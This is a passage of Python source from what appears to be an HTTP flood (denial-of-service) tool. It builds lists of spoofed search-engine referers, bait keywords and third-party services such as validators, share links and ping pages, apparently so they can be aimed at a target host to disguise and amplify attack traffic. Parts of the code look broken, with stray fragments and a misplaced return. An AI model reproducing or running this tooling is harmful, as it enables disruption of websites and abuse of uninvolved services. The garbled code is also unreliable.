headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
# generates a Keyword list
def keyword_list():
global keyword_top
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('adidas')
keyword_top.append('ask.fm')
keyword_top.append('adele')
keyword_top.append('5x nexus')
keyword_top.append('espn')
keyword_top.append('uggs')
keyword_top.append('uber')
keyword_top.append('american eagle')
keyword_top.append('jessica simpson')
keyword_top.append('jacket')
keyword_top.append('anderson east')
keyword_top.append('kroger')
('http://' + host + '/')
return(headers_referers)
def bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
